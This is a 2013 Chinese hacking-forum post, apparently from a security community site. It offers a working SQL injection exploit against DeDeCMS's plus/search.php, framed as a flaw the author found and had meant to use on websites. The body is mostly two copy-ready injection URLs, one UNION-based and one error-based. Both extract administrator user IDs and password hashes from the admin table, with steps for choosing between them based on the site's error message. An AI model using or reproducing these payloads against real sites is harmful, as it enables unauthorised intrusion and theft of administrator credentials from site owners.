找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2342|回复: 0
打印 上一主题 下一主题

[通杀]dedecms plus/search.php 注入漏洞利用EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-21 08:45:22 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
转载不加作者名的没JJ3 H/ `3 G" l* H
. f$ ~( f6 E; n3 ^
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站  放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
' ]* K9 u' _% Q1 k& f7 r& |! z3 c* S+ f7 V
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
; \8 d0 |( @  q0 Z1 G4 K. Y+ N% P5 O7 ~; G5 `( \3 g' R
我一般是这样测试的:# ?% j$ X1 S$ j/ r

! Y6 P  ]1 g4 n" r3 P' z1 S# e8 x提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a  s" z3 U1 W0 Q$ X- C! p1 {1 Y# I2 \

7 J; x( e. I" K2 R% x" h/ T5 N( S0 z转载不加作者名的没JJ
6 z% M; H$ `! {1 K
4 P5 w# Z, E4 E! `, [1 k作者:鬼哥
1 A; \) a& L5 T9 a" y& H+ b/ I6 X' v$ U+ K. Q& K

' U7 Q) k5 W. U0 G' M. L) x, m: [( j  S, W4 ?( z- L  L
看结果如果提示
: S* |/ Y% l& z, J7 x
! R+ c" x' _. X/ R$ _% KSafe Alert: Request Error step 2 !1 A! y0 W/ a  ^+ _
0 {7 D" h- \- o0 F5 A$ e
那么直接用下面的exp% [. P8 v9 s9 P# |2 A8 c7 ]- ]( [

/ z: Z! `, N& u( Rxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a# G6 w9 Y: {6 R) J5 i( w2 |4 L+ g

9 {# @$ `9 C* R! S  m+ X8 K/ V+ P( k- y- \4 p  S' _
看结果如果提示: N5 i+ X' X5 e: i- `

. d8 {& D7 V7 W0 V) vSafe Alert: Request Error step 1 !: Y; H7 b: m& q8 u7 O: @; a

  k) w* @: A1 c* l$ a0 _那么直接用下面的exp2 p4 ~( D& ?# \6 u2 o
) R9 O* l4 _9 w+ H8 L. L! ?2 H$ A
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a3 J) b* v4 ?# f1 n

6 z# O# x$ v: k1 S  ~
( v- ?1 T& p: `% d4 z如果正常显示证明漏洞不存在了。) q2 L3 E! r4 X4 M0 W
- G4 M" }+ r) Z, n( m' u
转载不加作者名的没JJ
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表